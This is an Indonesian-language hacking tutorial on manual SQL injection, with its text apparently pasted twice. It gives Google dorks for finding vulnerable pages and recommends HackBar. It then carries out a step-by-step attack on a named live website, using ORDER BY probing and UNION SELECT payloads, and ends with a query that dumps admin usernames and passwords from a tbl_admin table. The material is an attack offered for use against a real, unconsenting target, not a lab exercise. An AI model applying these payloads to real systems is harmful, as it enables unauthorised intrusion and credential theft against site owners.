Tutorial SQL injection Manual
[+] dork google = projects.php?cat_id=
index.php?id=
Sisanya Cari di mbah gugel , bejibun , atau kembangin sendiri
[+] hackbar = untuk permudah exploitasi
Download HACKBAR
[+] susu perawan dan kopi hangat
oke live target nya ini aja
http://www.rubin-arch.co.il/projects.php?cat_id=5
1. check vulnnya pakai kutip atas ( ' )
![[Image: RMRMp7h.png]](http://i.imgur.com/RMRMp7h.png)
2. find ada berapa table menggunakan
5 order by --
-5 order by 1--
5' order by 1--+
< Normal
< error
http://www.rubin-arch.co.il/projects.php?cat_id=5 order by 6-- < Error
berarti ada 5 table di web itu
dan eksekusi sampai 5 aja /sebelum errornya
3.cari letak table yang di gunakan untuk eksekusi/mencari db nya
http://www.rubin-arch.co.il/projects.php?cat_id=5 union select 1,2,3,4,5-- <<< whats ? kagak muncul letaknya ? itu kurang di kasih susu perawan
tambahin ( - ) strip di depan angka
< ada ni nomor 3
4. langsung aja di dios
gak perlu cari2 table dan column yang ribet
apa itu dios ? dump in one shop
sekali tusuk langsung masuk
< ini ss nya free pakai yang mana aja diosnya
asal jangan WAF
klo waf untuk website yang terdeteksi waf lah
macam forbidden , not acceptable , denied ahaha
5. itu sudah jelas letak user dan pass adminnya ada di tbl_admin
langsung inject bray
http://www.rubin-arch.co.il/projects.php?cat_id=-5 union select 1,2,group_concat(user_name,0x7c,user_pass),4,5 from tbl_admin--
terettereteret ketemukan
![[Image: IKtgssj.png]](http://i.imgur.com/IKtgssj.png)
so simple ?
Terima kasih kepada HumanEdoTensei atas tutorial nya ini :D
[+] dork google = projects.php?cat_id=
index.php?id=
Sisanya Cari di mbah gugel , bejibun , atau kembangin sendiri
[+] hackbar = untuk permudah exploitasi
Download HACKBAR
[+] susu perawan dan kopi hangat
oke live target nya ini aja
http://www.rubin-arch.co.il/projects.php?cat_id=5
1. check vulnnya pakai kutip atas ( ' )
![[Image: RMRMp7h.png]](http://i.imgur.com/RMRMp7h.png)
2. find ada berapa table menggunakan
5 order by --
-5 order by 1--
5' order by 1--+
![[Image: G1rc1d0.png]](http://i.imgur.com/G1rc1d0.png)
![[Image: IeS3haw.png]](http://i.imgur.com/IeS3haw.png)
http://www.rubin-arch.co.il/projects.php?cat_id=5 order by 6-- < Error
berarti ada 5 table di web itu

3.cari letak table yang di gunakan untuk eksekusi/mencari db nya
http://www.rubin-arch.co.il/projects.php?cat_id=5 union select 1,2,3,4,5-- <<< whats ? kagak muncul letaknya ? itu kurang di kasih susu perawan
tambahin ( - ) strip di depan angka
![[Image: pxJjCvC.png]](http://i.imgur.com/pxJjCvC.png)
4. langsung aja di dios

apa itu dios ? dump in one shop

![[Image: bPEOCOD.png]](http://i.imgur.com/bPEOCOD.png)
asal jangan WAF

macam forbidden , not acceptable , denied ahaha
5. itu sudah jelas letak user dan pass adminnya ada di tbl_admin
langsung inject bray
http://www.rubin-arch.co.il/projects.php?cat_id=-5 union select 1,2,group_concat(user_name,0x7c,user_pass),4,5 from tbl_admin--
terettereteret ketemukan
![[Image: IKtgssj.png]](http://i.imgur.com/IKtgssj.png)
so simple ?
Terima kasih kepada HumanEdoTensei atas tutorial nya ini :D